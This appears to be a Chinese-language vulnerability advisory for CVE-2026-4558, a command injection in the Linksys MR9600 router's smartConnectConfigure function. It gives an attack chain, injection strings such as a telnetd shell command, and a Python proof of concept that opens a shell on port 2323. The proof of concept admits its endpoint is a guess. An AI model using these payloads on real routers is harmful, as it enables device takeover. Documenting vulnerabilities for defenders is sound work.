CVE-2026-4558 Linksys MR9600 远程命令执行漏洞

漏洞信息

漏洞编号

CVE-2026-4558

漏洞类型

操作系统命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linksys MR9600

漏洞概述

Linksys MR9600 路由器固件版本 2.0.6.206937 中存在严重的操作系统命令注入漏洞。该漏洞位于 SmartConnect.lua 文件的 smartConnectConfigure 函数中，由于未对 configApSsid、configApPassphrase、srpLogin 和 srpPassword 等参数进行有效过滤，攻击者可构造恶意请求注入操作系统命令。此漏洞允许远程低权限攻击者在无需用户交互的情况下执行任意代码，完全控制设备，严重影响系统的机密性、完整性和可用性。

技术细节

该漏洞源于 Linksys MR9600 设备 Web 管理界面对 Lua 脚本输入的验证不足。具体受影响的是处理智能连接配置的 smartConnectConfigure 函数。当设备接收到包含 Wi-Fi 设置的配置请求时，该函数直接提取用户提供的 SSID、密码及登录凭证，并将其传递给底层的 Shell 环境执行。由于代码层面缺乏对 Shell 元字符（如 ;, |, `）的转义机制，攻击者可以利用这些参数拼接恶意命令。例如，在 srpLogin 字段中注入 `; reboot;` 或 `; telnetd -l /bin/sh;`，设备在执行配置逻辑时会同步执行攻击者的指令。根据 CVSS 3.1 评分，攻击复杂度低，且攻击者仅需具备低权限即可通过网络发起攻击，成功利用后将导致设备被完全接管。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的 Linksys MR9600 设备，并确定其固件版本为 2.0.6.206937。

STEP 2

利用

攻击者向目标设备的 Web 管理接口发送特制的 HTTP POST 请求，针对 smartConnectConfigure 接口，在 srpLogin 或 configApPassphrase 参数中注入恶意 Shell 命令。

STEP 3

执行

由于后端未过滤特殊字符，设备将恶意参数传递给系统 Shell 执行，导致攻击者获得操作系统层面的命令执行权限。

STEP 4

后渗透

攻击者利用获取的权限下载恶意载荷、开启后门（如 Telnet）、窃取敏感信息或破坏设备固件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example, actual endpoint may vary based on firmware)
target_url = "http://<router_ip>/apply.cgi"

# Vulnerable parameters based on the description
payload = {
    "submit_button": "smart_connect",
    "change_action": "gozila_cgi",
    "configApSsid": "Linksys_MyNetwork",
    # Injecting a simple command to verify vulnerability (e.g., creating a file or pinging)
    # The payload uses ';' to separate commands in the shell
    "configApPassphrase": "password123; touch /tmp/poc_verified;",
    "srpLogin": "admin; telnetd -l /bin/sh -p 2323 &",
    "srpPassword": "admin",
    "action": "Apply"
}

# Low privilege credentials might be required (PR:L)
auth = ("admin", "admin")

try:
    response = requests.post(target_url, data=payload, auth=auth, timeout=5)
    print(f"Status Code: {response.status_code}")
    print("Response body:")
    print(response.text)
    print("\nIf the command was injected, check for telnet on port 2323 or file creation.")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Linksys MR9600 2.0.6.206937

防御指南

临时缓解措施

建议用户立即检查 Linksys MR9600 的固件版本，若为 2.0.6.206937 或受影响版本，请暂时断开设备与互联网的连接，或关闭 Web 管理界面的 WAN 访问权限。同时，应定期更改路由器登录密码，并监控设备的异常流量或行为，直至官方发布安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4558
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4558
3 Details https://www.cvedetails.com/cve/CVE-2026-4558/
4 VulDB https://vuldb.com/cve/CVE-2026-4558
5 Link https://github.com/utmost3/cve/issues/1
6 Link https://vuldb.com/?ctiid.352385
7 Link https://vuldb.com/?id.352385
8 Link https://vuldb.com/?submit.775036
9 Link https://www.linksys.com/